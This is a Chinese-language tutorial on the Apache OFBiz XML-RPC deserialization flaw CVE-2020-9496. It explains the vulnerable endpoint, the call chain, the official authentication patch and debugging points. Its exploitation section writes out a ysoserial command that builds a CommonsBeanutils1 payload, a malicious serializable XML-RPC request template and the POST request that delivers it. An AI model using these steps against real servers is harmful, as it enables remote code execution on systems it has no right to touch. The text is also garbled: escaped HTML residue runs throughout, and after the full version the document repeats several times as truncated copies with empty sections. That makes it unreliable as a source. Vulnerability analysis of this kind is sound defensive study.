Apache Ofbiz XMLRPC RCE漏洞分析（CVE-2020-9496）教学文档<\/h1>

1. 漏洞概述<\/h2>
CVE-2020-9496是Apache Ofbiz框架中的一个远程代码执行漏洞，存在于XML-RPC接口中。该漏洞允许攻击者通过构造恶意的XML-RPC请求，触发Java反序列化漏洞，最终实现远程代码执行。<\/p>

2. 漏洞背景<\/h2>

2.1 Apache Ofbiz简介<\/h3>
Apache Ofbiz是一个开源的企业资源规划（ERP）系统，提供了一套完整的业务应用程序套件。<\/p>

2.2 XML-RPC简介<\/h3>
XML-RPC是一种远程过程调用协议，使用XML编码请求并通过HTTP传输。<\/p>

3. 漏洞分析<\/h2>

3.1 漏洞位置<\/h3>
漏洞存在于`\/webtools\/control\/xmlrpc<\/code>接口，该接口默认无需认证即可访问。<\/p>`

3.2 请求处理流程<\/h3>

请求首先由ControlServlet<\/code>处理<\/li>
路由到RequestHandler#doRequest()<\/code><\/li>
最终由XmlRpcEventHandler<\/code>处理XML-RPC请求<\/li>
<\/ol>
3.3 关键调用链<\/h3>
RequestHandler.runEvent()
→ XmlRpcEventHandler.invoke()
→ XmlRpcEventHandler.execute()
→ XmlRpcEventHandler.getRequest()
→ XML解析器处理XML数据
→ 触发反序列化
<\/code><\/pre>
4. 漏洞原理<\/h2>
4.1 XML-RPC数据处理<\/h3>
Ofbiz使用xmlrpc-common-3.1.3.jar<\/code>处理XML-RPC请求，其中SerializableParser<\/code>类存在反序列化操作。<\/p>
4.2 反序列化触发点<\/h3>
当XML数据中包含<serializable><\/code>标签时，会使用SerializableParser<\/code>进行解析，其中的数据会被反序列化。<\/p>
4.3 必要条件<\/h3>

必须使用<serializable><\/code>标签<\/li>
标签必须带有xmlns="http:\/\/ws.apache.org\/xmlrpc\/namespaces\/extensions"<\/code>属性<\/li>
序列化数据必须经过Base64编码<\/li>
<\/ol>
5. 漏洞利用<\/h2>
5.1 利用条件<\/h3>

目标系统包含Commons-Beanutils库<\/li>
可以访问\/webtools\/control\/xmlrpc<\/code>接口<\/li>
<\/ol>
5.2 利用步骤<\/h3>

生成CommonsBeanutils1的payload：<\/li>
<\/ol>
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 "calc"<\/span> | base64 | tr -d "\n"<\/span>
<\/span><\/span><\/code><\/pre>
构造恶意XML请求：<\/li>
<\/ol>
<?xml version="1.0"?><\/span>
<\/span><\/span><methodCall><\/span>
<\/span><\/span>  <methodName><\/span>ping<\/methodName><\/span>
<\/span><\/span>  <params><\/span>
<\/span><\/span>    <param><\/span>
<\/span><\/span>      <value><\/span>
<\/span><\/span>        <serializable<\/span> xmlns=<\/span>"http:\/\/ws.apache.org\/xmlrpc\/namespaces\/extensions"<\/span>><\/span>
<\/span><\/span>          [Base64编码的序列化数据]
<\/span><\/span>        <\/serializable><\/span>
<\/span><\/span>      <\/value><\/span>
<\/span><\/span>    <\/param><\/span>
<\/span><\/span>  <\/params><\/span>
<\/span><\/span><\/methodCall><\/span>
<\/span><\/span><\/code><\/pre>
发送POST请求到目标：<\/li>
<\/ol>
POST \/webtools\/control\/xmlrpc HTTP\/1.1
Host: [target]
Content-Type: application\/xml
Content-Length: [length]

[上述XML数据]
<\/code><\/pre>
6. 漏洞修复<\/h2>
6.1 官方修复<\/h3>
补丁链接：https:\/\/github.com\/apache\/ofbiz-framework\/commit\/4bdfb54ffb6e05215dd826ca2902c3e31420287a<\/p>
6.2 修复方式<\/h3>
在framework\/webtools\/webapp\/webtools\/WEB-INF\/controller.xml<\/code>中为xmlrpc请求添加了认证要求：<\/p>
<request-map<\/span> uri=<\/span>"xmlrpc"<\/span> track-serverhit=<\/span>"false"<\/span> track-visit=<\/span>"false"<\/span>><\/span>
<\/span><\/span>  <security<\/span> https=<\/span>"false"<\/span> auth=<\/span>"true"<\/span>\/><\/span>
<\/span><\/span>  <event<\/span> type=<\/span>"xmlrpc"<\/span>\/><\/span>
<\/span><\/span>  <response<\/span> name=<\/span>"error"<\/span> type=<\/span>"none"<\/span>\/><\/span>
<\/span><\/span>  <response<\/span> name=<\/span>"success"<\/span> type=<\/span>"none"<\/span>\/><\/span>
<\/span><\/span><\/request-map><\/span>
<\/span><\/span><\/code><\/pre>6.3 临时缓解措施<\/h3>

禁用\/webtools\/control\/xmlrpc<\/code>接口<\/li>
升级Commons-Beanutils等存在漏洞的库<\/li>
<\/ol>
7. 调试分析<\/h2>
7.1 关键调试点<\/h3>

org.apache.ofbiz.webapp.event.XmlRpcEventHandler#getRequest()<\/code> - XML解析入口<\/li>
org.apache.xmlrpc.parser.SerializableParser#getResult()<\/code> - 反序列化触发点<\/li>
<\/ol>
7.2 调试技巧<\/h3>

在SerializableParser.getResult()<\/code>设置断点<\/li>
观察XML解析过程中typeParser<\/code>的赋值过程<\/li>
<\/ol>
8. 相关技术点<\/h2>
8.1 XML-RPC数据类型<\/h3>

<base64><\/code>: Base64编码的二进制数据<\/li>
<struct><\/code>: 键值对结构<\/li>
<array><\/code>: 数组<\/li>
<serializable><\/code>: Java序列化对象<\/li>
<\/ul>
8.2 Ofbiz服务调用<\/h3>
Ofbiz有3000多个注册的service，其中export<\/code>属性为true<\/code>的service可通过XML-RPC调用。<\/p>
9. 参考链接<\/h2>

漏洞公告：https:\/\/securitylab.github.com\/advisories\/GHSL-2020-069-apache_ofbiz<\/li>
官方补丁：https:\/\/github.com\/apache\/ofbiz-framework\/commit\/4bdfb54ffb6e05215dd826ca2902c3e31420287a<\/li>
XML-RPC规范：http:\/\/xmlrpc.com\/spec.md<\/li>
XML-RPC数据类型：https:\/\/ws.apache.org\/xmlrpc\/types.html<\/li>
<\/ol>

Apache Ofbiz XMLRPC RCE漏洞分析（CVE-2020-9496）教学文档<\/h1>

1. 漏洞概述<\/h2>
CVE-2020-9496是Apache Ofbiz框架中的一个远程代码执行漏洞，存在于XML-RPC接口中。该漏洞允许攻击者通过构造恶意的XML-RPC请求，触发Java反序列化漏洞，最终实现远程代码执行。<\/p>

2. 漏洞背景<\/h2>

2.1 Apache Ofbiz简介<\/h3>
Apache Ofbiz是一个开源的企业资源规划（ERP）系统，提供了一套完整的业务应用程序套件。<\/p>

2.2 XML-RPC简介<\/h3>
XML-RPC是一种远程过程调用协议，使用XML编码请求并通过HTTP传输。<\/p>

3. 漏洞分析<\/h2>

3.1 漏洞位置<\/h3>
漏洞存在于`\/webtools\/control\/xmlrpc<\/code>接口，该接口默认无需认证即可访问。<\/p>`

4. 漏洞原理<\/h2>

4.1 XML-RPC数据处理<\/h3>
Ofbiz使用`xmlrpc-common-3.1.3.jar<\/code>处理XML-RPC请求，其中SerializableParser<\/code>类存在反序列化操作。<\/p>`

5. 漏洞利用<\/h2>

6. 漏洞修复<\/h2>

6.1 官方修复<\/h3>
补丁链接：https:\/\/github.com\/apache\/ofbiz-framework\/commit\/4bdfb54ffb6e05215dd826ca2902c3e31420287a<\/p>

7. 调试分析<\/h2>

8. 相关技术点<\/h2>

8.2 Ofbiz服务调用<\/h3>
Ofbiz有3000多个注册的service，其中`export<\/code>属性为true<\/code>的service可通过XML-RPC调用。<\/p>`

Apache Ofbiz XMLRPC RCE漏洞分析（CVE-2020-9496）教学文档<\/h1>

1. 漏洞概述<\/h2> CVE-2020-9496是Apache Ofbiz框架中的一个远程代码执行漏洞，存在于XML-RPC接口中。该漏洞允许攻击者通过构造恶意的XML-RPC请求，触发Java反序列化漏洞，最终实现远程代码执行。<\/p>

2. 漏洞背景<\/h2>

2.1 Apache Ofbiz简介<\/h3> Apache Ofbiz是一个开源的企业资源规划（ERP）系统，提供了一套完整的业务应用程序套件。<\/p>

2.2 XML-RPC简介<\/h3> XML-RPC是一种远程过程调用协议，使用XML编码请求并通过HTTP传输。<\/p>

3. 漏洞分析<\/h2>

3.1 漏洞位置<\/h3> 漏洞存在于\/webtools\/control\/xmlrpc<\/code>接口，该接口默认无需认证即可访问。<\/p>

4. 漏洞原理<\/h2>

4.1 XML-RPC数据处理<\/h3> Ofbiz使用xmlrpc-common-3.1.3.jar<\/code>处理XML-RPC请求，其中SerializableParser<\/code>类存在反序列化操作。<\/p>

5. 漏洞利用<\/h2>

6. 漏洞修复<\/h2>

6.1 官方修复<\/h3> 补丁链接：https:\/\/github.com\/apache\/ofbiz-framework\/commit\/4bdfb54ffb6e05215dd826ca2902c3e31420287a<\/p>

7. 调试分析<\/h2>

8. 相关技术点<\/h2>

8.2 Ofbiz服务调用<\/h3> Ofbiz有3000多个注册的service，其中export<\/code>属性为true<\/code>的service可通过XML-RPC调用。<\/p>

1. 漏洞概述<\/h2>
CVE-2020-9496是Apache Ofbiz框架中的一个远程代码执行漏洞，存在于XML-RPC接口中。该漏洞允许攻击者通过构造恶意的XML-RPC请求，触发Java反序列化漏洞，最终实现远程代码执行。<\/p>

2.1 Apache Ofbiz简介<\/h3>
Apache Ofbiz是一个开源的企业资源规划（ERP）系统，提供了一套完整的业务应用程序套件。<\/p>

2.2 XML-RPC简介<\/h3>
XML-RPC是一种远程过程调用协议，使用XML编码请求并通过HTTP传输。<\/p>

3.1 漏洞位置<\/h3>
漏洞存在于`\/webtools\/control\/xmlrpc<\/code>接口，该接口默认无需认证即可访问。<\/p>`

4.1 XML-RPC数据处理<\/h3>
Ofbiz使用`xmlrpc-common-3.1.3.jar<\/code>处理XML-RPC请求，其中SerializableParser<\/code>类存在反序列化操作。<\/p>`

6.1 官方修复<\/h3>
补丁链接：https:\/\/github.com\/apache\/ofbiz-framework\/commit\/4bdfb54ffb6e05215dd826ca2902c3e31420287a<\/p>

8.2 Ofbiz服务调用<\/h3>
Ofbiz有3000多个注册的service，其中`export<\/code>属性为true<\/code>的service可通过XML-RPC调用。<\/p>`